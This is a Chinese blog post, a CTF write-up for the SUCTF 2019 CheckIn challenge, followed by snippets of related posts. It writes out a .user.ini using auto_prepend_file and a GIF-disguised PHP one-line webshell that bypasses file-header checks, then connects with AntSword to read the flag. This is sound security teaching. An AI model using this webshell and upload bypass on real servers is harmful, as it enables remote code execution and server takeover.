一天一道ctf 第15天(.user.ini文件上传)

最新推荐文章于 2025-09-25 15:12:22 发布
原创 最新推荐文章于 2025-09-25 15:12:22 发布 · 392 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

该博客讲述了如何利用.user.ini文件的动态加载特性结合auto_prepend_file函数,构造一句话木马绕过文件头检测进行文件上传攻击。通过上传包含PHP代码的.gif文件,然后访问特定页面触发木马,最终通过蚁剑连接获取服务器信息。

[SUCTF 2019]CheckIn
看页面是一个文件上传漏洞
构造.user.ini文件和test.gif文件

//.user.ini
GIF89a
auto_prepend_file=test.gif

//test.gif
GIF89a
<script language="php">eval($_POST['a']);</script>

.user.ini是一个可以让用户自己写的ini文件,而且可以被动态加载,意味着我写好以后不用重启服务器也能运行。其中的auto_prepend_file函数可以让php文件自动包含某个文件,这里我们用auto_prepend_file=test.gif来包含写有一句话木马的test.gif。
因为上传过滤中加入了文件头检测,所以我们在前面加上GIF89a绕过

两次上传以后我们访问http://3cc9008b-881a-4bed-ae04-90fb8a1a768d.node3.buuoj.cn/uploads/d99081fe929b750e0557f85e6499103f/index.php页面显示GIF89a说明已经上传成功。我们再用蚁剑连接这个网址,虚拟终端输入cat /flag
在这里插入图片描述

scrawman
关注
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
热门推荐
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
.user.ini上传详解附CTF例题
hxhxhxhxx的博客
07-06 3458
.user.ini上传详解附CTF例题题目解法 https://buuoj.cn/challenges#[SUCTF%202019]CheckIn [SUCTF 2019]CheckIn 题目 解法 GIF89a //绕过exif_imagetype() auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。它包含在所有php文件前先执行 auto_append_file=a.j
文件上传-.user.ini利用
feiwujiushiwo的博客
08-13 903
php.ini是php的全局配置文件,对整个web服务起作用.user.ini.htaccess都是目录的配置文件.user.ini是用户自定义的php.in理解为包含文件。
CTF文件上传.user.ini
最新发布
m0_67212501的博客
09-25 689
2.这时我构造了一个带有恶意代码的图片文件,命名为a.jpg,但是直接上传是不可能获取权限的,服务器看到.jpg, .txt, .html这些扩展名,会认为它们是静态文件(图片、文本、网页),它会直接读取文件的内容,并发送给浏览器,不会调用 PHP 解释器。文件,虽然 a.jpg扩展名是 .jpg,但此时它是在 PHP 解释器内部被包含的,PHP 解释器不在乎文件扩展名,它只认文件内容里的。连接成功后,蚁剑的界面(如截图所示)就变成了一个可视化的文件管理器。于是,它成功地执行了a.jpg里的后门代码。
文件上传漏洞中的.user.ini文件
weixin_65279640的博客
04-18 1855
因此,正确配置 PHP 和服务器权限,以及限制对上传目录的访问,是非常重要的。文件允许用户为特定目录定义 PHP 配置指令,这些配置指令将在该目录及其所有子目录中的 PHP 脚本执行时生效。这样,不同的应用程序或用户可以在自己的目录中设置特定的 PHP 配置,而不影响整个服务器的配置。文件是 PHP 中用于配置特定目录的设置的特殊文件。如果服务器上的 PHP 没有正确配置,那么每当有 PHP 文件在这个目录下被访问时,文件到 PHP 服务器上,他们可能会利用这个文件来改变服务器的配置,例如修改。
文件上传-.user.ini的妙用
A_991128a的博客
04-14 1714
小伙伴们大家好!本期为大家带来的是在文件上传漏洞中的妙用。.user.ini.user.ini的妙用原理利用.user.ini的环境实战演示​1、先尝试直接上传webshell2、看是否能够上传除php和png外的文件3、上传.user.ini文件4、再次尝试上传webshell5、测试上传的.user.ini与webshell是否能够正常生效6、使用连接工具连接webshell。
CTF show 文件上传篇(web151-170,看这一篇就够啦)
m0_74825699的博客
12-10 1918
目录一.前言二.文件上传(web151-170)1.web151(前端绕过)1.1 编写一句话木马1.2.寻找突破点1.3.webshell连接1.4 利用条件2.web152(MIME头绕过)2.1 知识点2.2 绕过限制2.3 利用条件3.web153(.user.ini绕过)3.1 知识点?3.2 绕过限制3.3 利用条件4. web154(短标签绕过)4.1 知识点?4.2 绕过限制4.3 利用条件5. web155(同web154)6. web156(php关键字和[]绕过)6.1 知识点6.2
从零开始学CTF(第十二期)
2501_90727259的博客
07-09 750
Mellivora是一个轻量级开源CTF竞赛平台,基于PHP和MySQL开发,具有部署简单、性能优异和模块化设计等特点。本文详细介绍了Mellivora的搭建流程:从LAMP/LNMP环境准备、源码获取与配置,到数据库初始化、管理员账户创建;从赛事基础设置、题目管理、用户权限配置,到安全加固与性能优化措施。平台支持动态分值、团队模式等功能,可通过插件扩展定制化需求。文中还提供了高校CTF训练平台的实战案例,展示了Mellivora在小型赛事中的实际应用。
[BUUCTF]第五训练日志
Y1seco的博客
08-07 640
文章目录反序列化[GYCTF2020]Easyphp知识点WPbestphp's revenge知识点WP反思 反序列化 [GYCTF2020]Easyphp 知识点 PHP反序列化字符逃逸: PHP在进行反序列化的时候,只要前面的字符串符合反序列化的规则并能成功反序列化,那么将忽略后面多余的字符串 WP 源码泄露www.zip,解压发现php文件lib.php和update.php可以利用 update.php是输出flag <?php require_once('lib.php'); ech
ctfshow web13 文件上传.user.ini
m0_46412682的博客
07-16 2418
ctfshow web13 文件上传 开始的页面 先上传一张正常的照片,显示error file size,这张图片是886k,再上传一张小的照片还是error file size 不管先,上传一句话木马1.php,提示错误,应该是过滤了后缀名 现在上传1.txt,内容为<?php eval($_GET[‘w’]);?>,还是文件大小问题 内容改小一点<?php eval($_GET[w]); 这里我们实现能不能上传.htaccess文件,这里是上传不了 之前再buuctf中有道也是文件
[ctf web]上传user.ini绕过 文件上传漏洞 ctfshhow-web153 wp
ShenZ的博客
07-27 1246
这个太糟糕了,我typora截图好多,不知道有没有放乱掉 如果你目录下有user.ini会先去识别里面的配置,但是只有 PHP_INI_PERDIR 和 PHP_INI_USER 模式可以 找到这两个auto_append_file和auto_prepend_file,作用: 一个相当于在每个php文件尾加上 include(“xxxx”) 一个相当于文件头加上 include(“xxx”) 其中xxx就是 auto_append_file的值。 因为.user.ini只对他同一目录下的文件起作用,也就是
文件上传——.user.ini文件的利用和注意点
2401_82847928的博客
09-10 950
文件上传中,.user.ini.htaccess作用差不多,都是一种配置文件指定对于文件的解析方式。.user.ini 可以设置auto_prepend_file=xxx.xxx(文件名称)来指定对于上传文件的解析方式我们用一道例题来学习这个知识。
文件上传之利用user.ini实现任意文件上传
wcwdnmdnmd的博客
02-02 763
攻防世界的easyupload,利用user.ini实现文件上传
ctfshow web upload 153 使用.user.ini配置文件
2403_86685107的博客
05-13 377
这种方法前提:1.文件上传地址的同目录下要有可执行的php文件尝试发现,upload下有index.php(要有但内容无关紧要)2.服务器语言为php3.服务器使用cgi/fastcgi模式。
.user.ini配置文件
m0_52051132的博客
12-10 1448
user.ini。它比.htaccess 用的更广,不管服务器是 nginx/apache/IIS,当使用 CGI/.user.ini 文件作用:所有的 php 文件都自动包含 test.jpg 文件。.user.ini 相当于一个用。类似于 apache 的.htaccess,但语法与.htacces 不同,语法跟 php.ini 一致。FastCGI 来解析 php 时,php 会优先搜索目录下所有的.ini 文件,并应用其中的配置。再上传一个内容为 php 一句话脚本,命名为 test.jpg。
ctf web文件上传.user
03-24
文件上传漏洞是CTF竞赛中常见的Web安全挑战之一。这种类型的漏洞通常涉及攻击者通过绕过前端或后端验证机制,成功上传恶意脚本到目标服务器上,并最终实现远程代码执行(RCE)[^2]。 #### 核心概念与技巧分析 1. **...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值